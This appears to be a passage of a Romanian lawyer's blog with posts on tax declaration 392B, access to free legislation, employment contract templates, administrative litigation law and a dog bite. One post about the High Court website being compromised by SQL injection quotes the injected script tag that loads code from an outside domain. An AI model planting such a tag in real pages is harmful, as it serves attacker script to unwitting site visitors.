Scurtă plimbare prin iadul fiscal românesc – declarația 392B


Citeam că nedepunerea la termen a declarațiilor 392A și 392B se sancționează cu niște amenzi deloc de neglijat. Chiar și baroul are un anunț. Simțindu-mă vizat de obligația de declarare respectivă am urmat un pic firul textelor normative pentru a înțelege mai bine de ce, cum etc.

Am vizitat pagina ANAF indicată și în articol. Am descărcat progrămelul oferit de ANAF (D392_2011). Nu e locul aici să comentez despre programul oferit de ANAF – despre faptul că în universul lor există numai Windows și .exe, că aspectul aplicației trece cu un bocanc sovietic peste orice înseamnă interfață grafică modernă, stil, ergonomie, comportament intuitiv etc.

Am mai navigat pe sait până am ajuns la o pagină din care să descarc și declarația în format PDF – declarația 392B se referă la persoane impozabile neînregistrate în scopuri de TVA și care nu îndeplinesc condițiile de plafon etc. pentru TVA (cazul meu).

Declarația 392B este prevăzută de Ordinul președintelui Agenției Naționale de Administrare Fiscală nr. 1081/2011 pentru aprobarea modelului și conținutului unor formulare de declarații informative (publicat în Monitorul Oficial, Partea I, nr. 103/2011). În anexa la ordin sunt enunțate instrucțiunile de completare. Acolo găsesc câteva noțiuni precum: „Cifra de afaceri”, „Livrări de bunuri și prestări de servicii”, „Jurnalul pentru vânzări”, „Achiziții”, „Jurnalul pentru cumpărări”. Chiar dacă, realist vorbind, nu ne putem aștepta ca legea să aibă precizia unei definiții din matematică, totuși noțiunile utilizate într-un act normativ (unul fiscal!) nu ar trebui să fie deloc vagi, ci suficient de clare încât să permită contribuabilului să își cunoască exact obligațiile și drepturile – v. articolul 3 din Codul fiscal sau considerente din jurisprudența CJUE precum C-143/93 Gebroeders van Es Douane Agenten BV c. Inspecteur der Invoerrechten en Accijnzen, paragraful 27, sau T-115/94 Opel Austria GmbH c. Consiliul Uniunii Europene, paragraful 124; v. și jurisprudența CEDO – Cauza Rotaru contra României, paragraful 55. Așadar, presupunem că fiecare din noțiunile enumerate are o semnificație îndeajuns de clară încât să putem opera cu ea.

Ca avocat neplătitor de TVA și obligat să țin contabilitatea în partidă simplă nu îmi sunt familiare cele două registre contabile din care ar trebui să preiau datele pentru declarația 392B; registrul-jurnal de încasări și plăți este singurul pe care l-am completat până acum. Apropo de reglementarea privind contabilitatea în partidă simplă, în acel ordin din 2004 se fac trimiteri către Hotărârea Guvernului nr. 831/1997 pentru aprobarea modelelor formularelor comune privind activitatea financiară și contabilă…. În prezent acele trimiteri nu mai duc nicăieri întrucât hotărârea de Guvern a fost abrogată în 2009, fără a mai fi prevăzut altceva în loc.

La o căutare pe Internet după „jurnal pentru vânzări” și „jurnal pentru cumpărări” găsesc Ordinul Ministrului Finanțelor Publice nr. 425/1998 (publicat în Monitorul Oficial, Partea I, 391bis/1998).

În acest act normativ cele două jurnale au chiar și coduri: 14-6-12/a (Jurnalul pentru vânzări) și 14-6-17/b (Jurnalul pentru cumpărări). Verific apoi dacă ordinul mai este în vigoare. Se pare că nu. A fost abrogat de Ordinul Ministrului Finanțelor Publice nr. 1850/2004. Și el a fost abrogat – v. Ordinul Ministrului Economiei și Finanțelor nr. 3512/2008 (publicat în Monitorul Oficial, Partea I, nr. 870bis/2008). Abia acesta este actul aflat în vigoare în prezent, fiind modificat prin Ordinul Ministrului Finanțelor Publice nr. 2869/2010. Cele din urmă ordine nu mai au în conținutul lor reglementări referitoare la cele două jurnale buclucașe.

Cu puțin noroc, continuând căutarea pe Internet, găsesc o referire la actul normativ care ar reglementa jurnalele: Ordinul Ministrului Economiei și Finanțelor nr. 1372/2008 (publicat în Monitorul Oficial, Partea I, nr. 364/2008). În mărinimia emitentului, persoanele impozabile sunt lăsate să aprecieze asupra modului în care își vor ține evidența „corectă și completă” (v. în special articolul 1 alineatele (3)-(4) și articolul 2). Textul prevede că persoanele impozabile pot să folosească modelele orientative incluse în anexe. Este limpede că aceste persoane pot la fel de bine să nu folosească niciun fel de evidență de tipul jurnalului pentru vânzări și a celui pentru cumpărări. Își țin evidența în registrul-jurnal de încasări și plăți sau în formă electronică, declară și plătesc impozitele cu grija cetățeanului naiv… Și așa trece timpul până când își mai aduce aminte vreun ministru sau șef al ANAF că din hățișul de declarații și formulare existente deja în circulație parcă lipsește totuși ceva… o informativă care să fie completată folosind date dintr-un registru opțional… Și dă sfară în țară că pentru nedepunerea declarației 392B fiscul va amenda drastic contribuabilii indisciplinați care țineau cu orice preț să eludeze ansamblul coerent, simplu, clar, public și accesibil al reglementărilor fiscale.

Bineînțeles, s-au erodat demult așteptările ca legislația noastră să fie clară și redactată coerent, așa că îmi voi completa declarația folosind datele din registrul-jurnal de încasări și plăți. E un pic mai complicat să clasific în vreo categorie onorariile retrocedate de maestru – reprezintă ele contraprestația unei prestări de servicii? Plata unor taxe/contribuții către barou, CAA, INPPA, bugetul de stat este o „achiziție”? La fel, în lipsa jurnalelor pentru vânzări și cumpărări, e foarte complicat să calculez suma „achizițiilor” de la plătitori de TVA. Nicio problemă, dacă voi greși, fiscul va avea grijă să mă disciplineze pentru declarația care nu ar fi corectă și completă…

Reclame

Legislație gratuită, integrală și actualizată? Caz concret


Într-un text recent afirmam că e necesar ca orice modificare a unui act normativ să fie urmată imediat și automat de o consolidare a acestuia, astfel încât, pentru orice dată în care acest act este în vigoare, oricine să poată consulta forma integrală a actului.

Nu a trecut prea mult timp de atunci că ne-am și confruntat la cabinet cu un caz care ilustrează necesitatea accesului gratuit la legislația integrală și actualizată în mod oficial.

Este vorba despre suspendarea de drept a raportului de serviciu al unui funcționar public, ca urmare a angajării acestuia la cabinetul unui demnitar – v. articolul 94 alineatul (1) litera b) din Legea 188/1999 privind Statutul funcționarilor publici.
Problema concretă: care era forma în vigoare a legii în luna noiembrie 2011?

De ce nu folosești un produs informatic cu legislația României?
Am apelat la informațiile provenite din trei asemenea produse, printre cele mai respectabile din piață. În mod cu totul surprinzător, fiecare dintre cele trei prezintă o formă proprie pentru articolul menționat mai sus, valabilă în aceeași perioadă.

Potrivit aplicației Legis, produsă de CTCE Piatra Neamț, litera b) a fost abrogată. Pentru a explica această stare, produsul respectiv include și o opinie formulată de Agenția Națională a Funcționarilor Publici.

Potrivit aplicației Indaco Lege4, produsă de Indaco Systems, litera b) avea următorul conținut:

b) este încadrat la cabinetul unui demnitar;

Potrivit aplicației Legalis, litera b) avea un alt conținut:

b) este încadrat la cabinetul unui demnitar, la cabinetul unui primar sau, după caz, la cabinetul unui președinte al consiliului județean ori la cancelaria prefectului;

Toate aceste texte sunt cele rezultate după consolidarea textului Legii 188/1999 (neoficial, bineînțeles), ultima modificare inclusă fiind cea efectuată prin Legea-cadru 284/2010.

Această situație are la origine o tehnică legislativă defectuoasă, lăsată fără nicio sancțiune de Legea 24/2000, care reglementează generic tehnica legislativă. Nu poate fi imputat furnizorilor de programe de legislație că din toate interpretările posibile fiecare a ales câte una – a funcționat o altă lege, a lui Murphy: Tot ceea ce poate merge prost va merge prost.

Pe scurt, firul modificărilor Legii 188/1999, relevante în speță, ar fi:

  1. legea a fost republicată în 2007; forma textului de la litera b) coincidea cu forma afișată de Indaco Lege4;
  2. prin OUG 105/2009 a fost modificat articolul 94 alineatul (1) litera b), fiind adăugate câteva noi situații de angajare a unui funcționar public, avută în vedere la suspendarea de drept a raportului său de serviciu; forma textului de la litera b) coincidea cu forma afișată de Legalis;
  3. prin Legea 140/2010 erau efectuate modificări direct asupra Legii 188/1999, iar printr-o prevedere referitoare strict la OUG 105/2009 erau abrogate câteva prevederi din aceasta, inclusiv buclucașa literă b); acest rezultat coincide cu cel afișat în aplicația Legis;
  4. abia prin Legea 264/2010 era aprobată cu modificări OUG 105/2009.

Avem o legislație stufoasă și instabilă, cu multe hibe din perspectiva tehnicii legislative (v. paralelisme, prevederi incomplete și interpretabile, modificări ale modificărilor etc.). Aceasta nu este nici măcar accesibilă publicului în mod gratuit. Tot ce ne lipsea, pentru un tablou complet al insecurității juridice, era să fim nevoiți să aflăm prin forțe proprii forma aplicabilă a legii la o dată specificată.

P.S.: Ca o completare la textul anterior, Regia Autonomă „Monitorul Oficial” are deja produsul informatic atât de râvnit: Expert Monitor. Dacă ținem cont de descrierea producătorului, această aplicație este exact ceea ce solicitau și parlamentarii care inițiaseră lăudabilul proiect menționat anterior. Singura problemă actuală este costul.

Ne trebuie o legislație gratuită, integrală și actualizată!


Cu aproape doi ani în urmă am primit un neașteptat cadou din partea unei persoane pe care nu o cunoșteam (detaliile rămân la purtător; chiar și pentru o mențiune ca asta s-ar putea să-mi reproșeze că a devenit o notă de subsol… 🙂 ). Cadoul era un colet cu niște DVD-uri cuprinzând în format PDF toate edițiile Monitorului Oficial, partea I, din 1989 până la data curentă. Îmi este de mare folos, mai ales în activitatea de zi cu zi la cabinet.

Am avut surpriza să găsesc respectiva colecție și pe un sait despre care rotld.ro spunea că numele de domeniu este înregistrat de domnul Andrei Săvescu (avocat, coordonator al juridice.ro): www.moficial.ro.
Colecția era publicată în cea mai brută formă posibilă, serverul generând o listă simplă a documentelor, grupate pe ani. Fără reclame, fără nume, fără stiluri, fără asocieri cu vreo persoană.
Am mai descoperit apoi că aceeași rețetă era folosită și de saitul www.kurtyan.org, cu diferența că acesta cuprinde toate părțile publicației oficiale a statului (I-VII):

  • I – acte ale parlamentului, ale guvernului, ale miniștrilor, ale unor instanțe și autorități centrale etc.;
  • II – acte privind activitatea parlamentară;
  • III – diverse acte juridice, înscrisuri, comunicări etc.;
  • IV – acte juridice referitoare la operatori economici sau alte persoane juridice;
  • V – contracte colective de muncă, convenții și recomandări ale Organizației Internaționale a Muncii;
  • VI – anunțuri privind achizițiile publice;
  • VII – publicații ale societăților cooperative.

Am aflat apoi și de conflictul dintre Regia Autonomă Monitorul Oficial (RAMO) și domnii Andrei Săvescu și Alberto Kurtyan. Pe scurt, RAMO a sesizat organele de urmărire penală cu privire la încălcarea unor drepturi de proprietate intelectuală pe care regia le-ar avea asupra Monitorului Oficial; detalii aici:

Cumva pentru a evita eventuale pretenții ale RAMO referitoare la formatul „protejat” al Monitorului Oficial, alți prieteni au inițiat pe cheltuiala și munca lor un alt sait – civvic.ro – care are un scop pe cât de generos, pe atât de greu de atins: publicarea în mod gratuit a conținutului Monitorului Oficial într-un format text, ușor de prelucrat prin mijloace electronice (spre deosebire de formatul PDF oferit de RAMO). Nu e prima lor „abatere”. Dacă utilizați dexonline.ro, ați făcut deja cunoștință cu munca lor.

E de prisos să reiau o întreagă justificare a legitimității publicării în mod gratuit a Monitorului Oficial. Au făcut-o alții mai pricepuți înainte.
E clar ca lumina zilei că legea este o informație de interes public, care trebuie să fie accesibilă oricui și că e datoria statului să depună toate eforturile necesare pentru cunoașterea ei. Felul în care stau lucrurile acum nu poate continua prea mult. Nu trebuie ratat prilejul real de dezbatere oferit de conflictele cu RAMO ale celor doi juriști. Poate că prin emisiunile de pălăvrăgeală continuă de la TV se va găsi și niște loc pentru discutarea unei probleme care, indirect sau direct, îi afectează pe toți cei care trăiesc în această țară.

Poate așa află și concetățenii noștri că, potrivit autorităților statului, legislația trebuie să fie o afacere și nu un bun comun, dar, în același timp, nimeni nu poate invoca în fața vreunei autorități că nu a cunoscut legea (cine nu cunoaște celebra zicere nemo censetur ignorare legem?).
Legislația, în viziunea reprezentanților statului, trebuie să fie o colecție de PDF-uri sau de coli de proastă calitate, trântite aproape zilnic, cuprinzând o mulțime de modificări ale modificărilor, pentru care cetățenii trebuie să aibă respect și să plătească abonamente piperate la tiparnița de legi.

O regulă banală a dreptului românesc este aceea că se aplică legea în vigoare la momentul realizării unui act sau fapt juridic. Dacă, de pildă, pentru fapte petrecute în 2006, am nevoie de textul în vigoare la acea dată al vreunei monstruozități normative (ex. Legea 247/2005, Legea 571/2003, Legea 161/2003 etc. etc., ca să nu mai vorbim despre aberantele norme metodologice – v. cele ale Codului fiscal pentru o idee de legislație secundară a la România…), am ghinion. Trebuie să răscolesc colecția de hârtii sau PDF-uri cu Monitorul Oficial și să pun cap la cap forma de atunci a legii care m-ar interesa. Și cum la noi modificările nu numai că sunt prea frecvente, dar sunt și haotice, e greu să îți dai seama dacă la o anume dată nu exista cumva vreo ordonanță de urgență a cărei lege de aprobare o modifica (lege la rândul ei modificată de o altă ordonanță…). De un real ajutor în asemenea încercări ar fi Baza de date legislativă oferită gratuit de Camera Deputaților. Acolo îți poți face o idee despre actele care au modificat o lege. Defectul ei: nu e întotdeauna completă și actualizată. Chiar și așa, este enorm timpul pierdut pentru compilarea unui text normativ, în scopul de a afla forma aplicabilă la o anume dată.
Avem calculatoare, Internet, tehnologii care ușurează viața etc., dar statul nostru continuă să prefere și să impună formele secolului trecut (v. dependența de hârtie, taxele pentru orice, timbrele fiscale și judiciare, ștampilele, dischetele, ghișeul cu ușiță de geam…).

„De ce nu cumperi un produs informatic cu legislația României?” De ce ar trebui? Legislația e obligatorie; ar trebui ca și un abonament la un produs software (oficial sau neoficial) să fie obligatoriu? Plătim deja impozite suficient de mari încât RAMO să aibă resurse pentru a face un sait în care să afișeze, fără restricții, abonamente, taxe sau tarife, tot ceea ce este public și obligatoriu pentru noi. Nu e însă de ajuns. Ceea ce ne oferă trebuie să beneficieze de toată încrederea că reprezintă un act oficial. Mai mult, orice modificare a unui act normativ trebuie să fie urmată imediat și automat de o consolidare a acestuia, astfel încât, pentru orice dată în care acest act este în vigoare, oricine să poată consulta forma integrală a actului, în multiple formate (ex. HTML, PDF). Aș avea de adăugat și o propunere de versionare a actelor normative, inspirată din sisteme de „revision control” – de discutat cu altă ocazie.
Repet exemplul pe care îl menționez adesea: Legifrance – serviciul public francez de difuzare a dreptului prin Internet.

Așa ceva a fost deja cerut și de inițiatorii unui proiect legislativ respins în ambele camere ale parlamentului. Acea inițiativă poate fi îmbunătățită, evitând criticile formale ale guvernului și realizând un obiectiv de interes pentru toți cetățenii. Un astfel de obiectiv îl are și apelul public făcut de juridice.ro: Legislatia Romaniei: Gratuit si Integral. Printre semnatari se află, probabil în majoritate, juriști (avocați, consilieri juridici, judecători etc.) care au avut suficiente ocazii să constate că e nevoie de o schimbare esențială a felului în care statul român comunică legislația.

Cei doi domni menționați mai sus au făcut un serviciu publicului. Și-au asumat riscul de a publica gratuit ceea ce statul ar fi trebuit să publice gratuit și riscul de a fi hărțuiți prin procese de RAMO. Pentru acest curaj și pentru beneficiile pe care le au vizitatorii saiturilor lor merită recunoștința și susținerea noastră, nicidecum amenzi sau condamnări penale.

Citește și:
Inflația legislativă în România
Goliat

Cât de obligatoriu este modelul contractului individual de muncă?


Probabil că sunt destui practicieni în resurse umane care ar fi (foarte) reticenți față de utilizarea unui model de contract individual de muncă diferit de cel „standard”, vehiculat și pe Internet. Ca și în cazul altor practici din domeniu (v. fișe de post, note de lichidare, organigrame, state de funcții), modelul contractului individual de muncă este privit ca fiind obligatoriu și intangibil. Dacă, de pildă, chiar de la încheierea contractului părțile convin asupra unor clauze suplimentare (precum cea de neconcurență sau cea de confidențialitate), aceste clauze se vor regăsi, cu maximă probabilitate, într-un act adițional la contract, deși ele ar putea foarte bine să fie incluse în textul contractului.

Ideea că modelul este obligatoriu a fost cumva întreținută și de practica ITM în perioada în care exista obligația angajatorilor de a depune și înregistra contractele de muncă sau actele adiționale la acestea (v. Legea 130/1999 privind unele măsuri de protecție a persoanelor încadrate în muncă, în prezent abrogată). Atunci, un simplu contract redactat diferit de model era capabil să „blocheze sistemul” vreunui funcționar, care era în stare să refuze înregistrarea contractului până când acesta nu era „remediat”.

Scurt istoric

În 2003 a fost adoptat actualul cod al muncii, modernizând la acel moment legislația de bază în domeniul raporturilor de muncă (codul în vigoare până atunci a fost Legea 10/1972 – textele acesteia referitoare la orânduirea socialistă au rezistat aproape 13 ani după Revoluție).
Tot în 2003, ministrul muncii, promotor al Legii 53/2003, a emis Ordinul 64/2003 pentru aprobarea modelului-cadru al contractului individual de muncă. Ultima modificare a acestui ordin de ministru a fost făcută prin Ordinul 1.616/2011, după schimbările efectuate asupra Codului muncii (v. forma republicată).

În paralel cu modelul prevăzut în ordinul de ministru, contractul colectiv de muncă unic la nivel național (atât cel pentru anii 2005-2006, cât și cel pentru anii 2007-2010), cuprindea la articolul 71:3 următoarea prevedere: CIM va cuprinde cel puțin clauzele prevăzute în anexa nr. 3. Modelul din această anexă avea diferențe minore față de cel din ordinul de ministru. În prezent, contractul colectiv de muncă la nivel național nu mai are acoperire în lege (v. articolul 128:1 din Legea 62/2011 a dialogului social).

Obligativitatea modelului din ordinul de ministru

Separarea puterilor în stat presupune delimitarea atribuțiilor acestora. În principiu, potrivit Constituției, parlamentul („unica autoritate legiuitoare a țării”) emite legi, guvernul „potrivit programului său de guvernare acceptat de Parlament, asigură realizarea politicii interne și externe a țării și exercită conducerea generală a administrației publice”, iar prin hotărâri „organizează executarea legilor”, instanțele judecătorești realizează justiția. În dreptul românesc, cel puțin teoretic, există o ierarhie a normelor juridice – acele reguli de conduită obligatorii, care pot fi puse în aplicare inclusiv cu ajutorul constrângerii exercitate de stat. În această ierarhie, normele Constituției și cele ale tratatelor internaționale privind drepturile omului, respectiv ale dreptului comunitar, prevalează asupra normelor incluse în acte cu forță de lege (legi, ordonanțe ale guvernului); acestea din urmă prevalează asupra normelor incluse în hotărâri de guvern, ordine de ministru etc.
Așa se face că, pentru a fi legal, orice act al guvernului sau al unui membru al guvernului trebuie să fie întemeiat pe un act cu forță juridică superioară. Altfel, guvernul sau membrii săi ar avea putere de a emite norme generale și obligatorii, în aceleași condiții ca și parlamentul – ceea ce echivalează cu o nesocotire a separării puterilor în stat.

Aceste idei sunt conținute și în Legea 24/2000 privind normele de tehnică legislativă pentru elaborarea actelor normative:

Articolul 4
Ierarhia actelor normative
(1) Actele normative se elaborează în funcție de ierarhia lor, de categoria acestora și de autoritatea publică competentă să le adopte.
(2) Categoriile de acte normative și normele de competență privind adoptarea acestora sunt stabilite prin Constituția României, republicată, și prin celelalte legi.
(3) Actele normative date în executarea legilor, ordonanțelor sau a hotărârilor Guvernului se emit în limitele și potrivit normelor care le ordonă.

Articolul 42
Formula introductivă
(4) La celelalte categorii de acte normative formula introductivă cuprinde autoritatea emitentă, denumirea generică a actului, în funcție de natura sa juridică, precum și temeiurile juridice pe baza și în executarea cărora actul a fost emis.

Articolul 77
Actele date în executarea unui act normativ
Ordinele cu caracter normativ, instrucțiunile și alte asemenea acte ale conducătorilor ministerelor și ai celorlalte organe ale administrației publice centrale de specialitate sau ale autorităților administrative autonome se emit numai pe baza și în executarea legilor, a hotărârilor și a ordonanțelor Guvernului. În formula introductivă a acestor acte normative vor fi cuprinse toate temeiurile juridice prevăzute la art. 42 alin. (4).

Articolul 78
Sfera reglementării
Ordinele, instrucțiunile și alte asemenea acte trebuie să se limiteze strict la cadrul stabilit de actele pe baza și în executarea cărora au fost emise și nu pot conține soluții care să contravină prevederilor acestora.

În cazul ordinului de ministru prin care era aprobat modelul-cadru al contractului individual de muncă, formula introductivă, exprimând temeiul juridic al actului, arată astfel:

Având în vedere prevederile art. 17 alin. (3) din Legea nr. 53/2003 – Codul muncii,
în baza art. 7 din Hotărârea Guvernului nr. 4/2001 privind organizarea și funcționarea Ministerului Muncii și Solidarității Sociale, cu modificările și completările ulterioare,
ministrul muncii și solidarității sociale emite următorul ordin:

Ordinul 1.616/2010 schimbă numai referința către hotărârea de guvern privind organizarea ministerului muncii (HG 11/2009).

Să verificăm cele două referințe normative menționate în formula introductivă:

Codul muncii
Articolul 17
(3) Persoana selectată în vederea angajării ori salariatul, după caz, va fi informată cu privire la cel puțin următoarele elemente: (…)

HG 11/2009 privind organizarea și funcționarea Ministerului Muncii, Familiei și Protecției Sociale
Articolul 12
În exercitarea atribuțiilor sale, ministrul muncii, familiei și protecției sociale emite ordine, norme și instrucțiuni.

Singurele temeiuri care stau la baza ordinului privind modelul de contract sunt (1) un text legal referitor la obligația de informare pe care o are angajatorul și (2) un text dintr-o hotărâre de guvern care arată că ministrul muncii poate emite ordine. În lipsa unei abilitări explicite, prevăzute de un act cu forță superioară ordinului, în concret, cele două temeiuri invocate apar ca simple referințe formale, insuficiente pentru a susține ordinul de ministru.

Potrivit articolului 17:4 din Codul muncii, „Elementele din informarea prevăzută la alin. (3) trebuie să se regăsească și în conținutul contractului individual de muncă”. Este clar că existența acestor elemente este obligatorie în contract. Nu contează ordinea, modul de structurare, numerotarea articolelor, formatul etc. cât timp, în fond, fiecare dintre cele 14 elemente de conținut are o exprimare clară în cuprinsul contractului. Nu contează forma prevăzută de ordinul de ministru, cât timp fondul prevăzut de lege este respectat.

În plus, presupunând că modelul din ordinul de ministru ar fi obligatoriu, care ar putea fi sancțiunea pentru un angajator care urmează cu strictețe conținutul cerut de lege, dar nu și forma prevăzută din ordinul de ministru? O asemenea sancțiune nu este prevăzută nicăieri – nici în Codul muncii, nici în ordin. Presupunând că ITM ar sancționa cu amendă contravențională neutilizarea modelului de contract, o astfel de sancțiune ar fi aplicată în mod nelegal, întrucât în cazul contravențiilor (și al infracțiunilor, de altfel) funcționează principiul legalității sancțiunii – cf. articolul 3:1 din OG 2/2001 privind regimul juridic al contravențiilor: „Actele normative prin care se stabilesc contravenții vor cuprinde descrierea faptelor ce constituie contravenții și sancțiunea ce urmează să se aplice pentru fiecare dintre acestea”.

Modelul-cadru de contract nu este conceput pentru a acoperi toate situațiile în care se încheie un contract individual de muncă. De pildă, modelul nu are în vedere ipoteza unor contracte speciale – v. contractul privind desfășurarea activității în străinătate (articolul 18), contractul de muncă temporară (articolul 94), contractul individual de muncă la domiciliu (articolul 109). Nici referirea de la articolul G:1 la Legea 31/1991 privind stabilirea duratei timpului de muncă sub 8 ore pe zi pentru salariații care lucrează în condiții deosebite – vătămătoare, grele sau periculoase nu este aplicabilă chiar tuturor cazurilor concrete în care se încheie contractul. De altfel, deși unele texte din model figurează ca alineate numerotate, ele se exclud reciproc (ex. durata muncii este fie normală – H:1 -, fie parțială – H:2; ambele opțiuni incluse în același contract nu au sens, fiind necesară marcarea uneia dintre ele ca fiind aplicabilă).

Concluzionând, modelul-cadru de contract individual de muncă nu este un formular tipizat, obligatoriu și de neschimbat, ci un simplu model de care angajatorii pot ține cont. În cazul în care aleg să utilizeze un model propriu de contract, trebuie să respecte cu strictețe cerințele de conținut prevăzute în lege, inclusiv pentru forma specifică a raportului de muncă ales (ex. muncă temporară, la domiciliu, în străinătate etc.).

www.scj.ro a primit o injecție cu SQL


Încercam să aflu ceva de pe saitul Înaltei Curți de Casație și Justiție (denumit, foarte românește, folosind inițialele de la Supreme Court of Justice… până la urmă We’re all living in America, nu?).

Lista de ședințe nu funcționează. Văzând ceea ce era afișat, bănuiam că vreun dorel nu a închis cum trebuie niște ghilimele prin sursă. Încerc să aflu despre ce e vorba și văd ceva și mai drăgălaș: <script src=”http://lilupophilupop.com/sl.php”></script&gt;. O căutare pe Google lămurește problema – injecție SQL. ECRIS (versiunea anacronică, din 2005, pentru Î.C.C.J.) se pare că e vulnerabil. Cam cât de romantic ar fi ca și ECRIS IV, folosit de restul instanțelor din țară, să aibă astfel de vulnerabilități?…

Curtea de Apel București se fălește deja cu un nou sait (se putea mai bine… părerea mea), pe când unul nou, funcțional și util și la Î.C.C.J.?

La mulți ani!

Completare (4 ianuarie 2012): S-a reparat.

Citește și:
ECRIS – este bun, dar poate fi și mai bun

Ce lipsește din legea contenciosului administrativ?


Cum să omori muște cu bomba atomică

După ce România a devenit stat membru al Uniunii Europene (1 ianuarie 2007) Legea 554/2004 a contenciosului administrativ a fost modificată, printre altele fiind adăugat un caz special de revizuire (v. articolul 21:2), pe lângă cele din dreptul comun (v. articolul 322 din Codul de procedură civilă):

(2) Constituie motiv de revizuire, care se adaugă la cele prevăzute de Codul de procedură civilă, pronunțarea hotărârilor rămase definitive și irevocabile prin încălcarea principiului priorității dreptului comunitar, reglementat de art. 148 alin. (2), coroborat cu art. 20 alin. (2) din Constituția României, republicată. Cererea de revizuire se introduce în termen de 15 zile de la comunicare, care se face, prin derogare de la regula consacrată de art. 17 alin. (3), la cererea temeinic motivată a părții interesate, în termen de 15 zile de la pronunțare. Cererea de revizuire se soluționează de urgență și cu precădere, într-un termen maxim de 60 de zile de la înregistrare.

Scopul evident al acestei noi prevederi era acela de a oferi un remediu pentru cazurile în care instanțele naționale au pronunțat hotărâri irevocabile care încalcă principiul priorității dreptului comunitar (dreptul Uniunii Europene). Criticabil ar fi faptul că acest remediu este prevăzut numai în contextul contenciosului administrativ. Or, dreptul comunitar poate fi încălcat și în alte ramuri de drept, acolo neputându-se folosi cazul special de revizuire prevăzut de Legea 554/2004.
Nu cunosc rata de succes a revizuirilor bazate pe acest caz special. Pot bănui că majoritatea lor au fost respinse (ex. hotărârile atacate „nu evocau fondul”, instanțele nu au constatat o încălcare a dreptului comunitar etc.). Totuși, fie și teoretic și iluzoriu, era un mijloc pus la dispoziția justițiabililor.

Prin Decizia 1.609/2010 a Curții Constituționale a fost admisă excepția de neconstituționalitate privind teza a doua a alineatului citat mai sus – fraza referitoare la termenul de introducere a cererii de revizuire. În această situație a devenit aplicabil textul articolului 33 din Legea 47/1992 (suspendarea efectelor juridice ale normei neconstituționale pentru 45 de zile, urmată de încetarea efectelor după expirarea acestui termen).

Proiectul de modificare a Legii 554/2004 a ajuns în dezbatere parlamentară mai întâi în Camera Deputaților. Forma inițiatorului, adoptată tacit de Cameră (în aprilie 2011), clarifica textul criticat de Curtea Constituțională: „(…) Hotărârea se comunică părții interesate în termen de 30 de zile de la pronunțare. Cererea de revizuire se introduce în termen de 15 zile de la comunicare (…)”.
Apoi a venit rândul Senatului (aveți răbdare cu pagina web…). Comisia juridică din Senat a hotărât, pe baza unei motivări criticabile, cu referiri mai ales la noul Cod de procedură civilă (Legea 134/2010 – adoptată, dar a cărei intrare în vigoare e lăsată în incertitudine), că întregul alineat (2) trebuie abrogat.
Senatul a adoptat proiectul și astfel, prin Legea 299/2011, alineatul (2) al articolului 21 din Legea 554/2004 a fost abrogat.

P.S. În actuala așezare, camera decizională poate modifica total și esențial un proiect primit de la prima cameră sesizată, această modificare devenind lege, indiferent de dezbaterile, propunerile, timpul pierdut etc. din prima cameră.

Cadoul meu de Moș Nicolae


Ieri, în drum spre barou, am hotărât să caut o rută mai scurtă pentru a evita monotonia drumului meu obișnuit. Îmi trebuie vreo 5 minute pentru a străbate cei 300 m între cabinet și barou (pe undeva prin zona centrală a Craiovei), dar ieri am avut prea puțină răbdare și prea mult „spirit de aventură”. În loc să merg pe Calea București, am mers printre blocuri.

Aventura nu s-a lăsat prea mult așteptată. M-au întâmpinat doi câini cărora le călcasem teritoriul. Unul dintre ei a reușit să mă „composteze” tocmai când credeam că scăpasem din zona fierbinte. Am simțit mușcătura de deasupra gleznei, dar nu i-am dat prea multă importanță. După ce am mai mers câteva zeci de metri zona mușcată a început să doară. Abia atunci am observat că aveam pantalonul rupt destul de serios și că rana sângera încet.

Mi-am rezolvat treburile la barou, iar apoi am revenit acasă. Mi-am curățat și pansat rana.
Abia pe seară, la insistența Cristianei și după ce apucasem să citesc pe net despre rabie, am mers la spital pentru un vaccin.

La registratura urgenței chiar înainte să apuc să întreb ce-i de făcut, mi-a luat-o înainte o domnișoară care spunea că ea a fost prima. Am lăsat-o să întrebe. Așa am aflat că și ea fusese mușcată de un câine vagabond.
După ce am dat informațiile cerute de asistentă am așteptat să îmi vină rândul la vaccin. Nu era vorba de unul antirabic, ci de unul antitetanos.

Am așteptat vreo oră și jumătate până să fiu strigat – cazuri cu prioritate, urgențe etc. Am fost vaccinat și am primit o rețetă și o trimitere pentru un consult privind oportunitatea unui vaccin antirabic.

De Sf. Nicolae, după rezolvarea cazului de la judecătorie, am mers la spital. Doctorul de la boli infecțioase a apreciat că nu e cazul pentru un vaccin antirabic, riscul de infectare fiind minim (nu sunt un fan al înțepăturilor, așa că nu am așteptat să se răzgândească). Am cumpărat apoi și pastilele (Oxacilină).

Frumos dar…

Nu am vreo fobie față de câini. Am crescut la țară, unde bunicii mei aveau vreo 14 câini, de la pitici (denumiți copoi în acea regiune) la câini mari, ciobănești. Când aveam 5 ani am fost mușcat chiar de față de unul dintre câinii mari din curte. Nu m-a afectat prea mult asta – am doar o cicatrice destul de mică pe obraz. Am continuat să fiu prieten cu câinii. Ori de câte ori mai ajung pe la țară îmi place să mă joc cu ei. Nici față de câinii de pe stradă nu am vreo teamă, chiar dacă am fost alergat de turme de câini când eram cu bicicleta.

Cu toate astea, deja nu mai pot asculta fără reacție „dezbaterea” despre câinii fără stăpân, eutanasie etc. Sunt sătul să aud că victimele sunt, până la urmă, vinovate pentru că au fost mușcate (am auzit și inepții precum: câinii sunt niște „biete suflete”, care mușcă numai oamenii răi; numai câinii care au mușcat pe cineva ar trebui eutanasiați etc.). Sunt sătul și să văd marii apărători ai „drepturilor” animalelor (ex. avocata P. Iacob, ex-senatorul M. Marinescu) intervenind la TV de fiecare dată când se discută despre eutanasierea câinilor fără stăpân. De fiecare dată sunt uimit de apărarea înverșunată pe care o fac animalelor, uitând că victimele lor sunt oameni. Pentru unii pare chiar scuzabilă suferința pricinuită unui om. Cei care mor (exemplu, alt exemplu) sau care rămân mutilați sunt vinovații. Lor le este mereu imputabilă fie neatenția, fie prostia, fie răutatea. Câinii sunt doar biete victime ale victimelor lor…

Prevenirea înmulțirii câinilor vagabonzi este una, iar prevenirea riscului de a fi mușcat este alta. Nu există nicio garanție că un câine care a fost sterilizat (dacă a fost…), marcat cu un plastic pe ureche și apoi lăsat pe stradă, nu mai poate mușca.

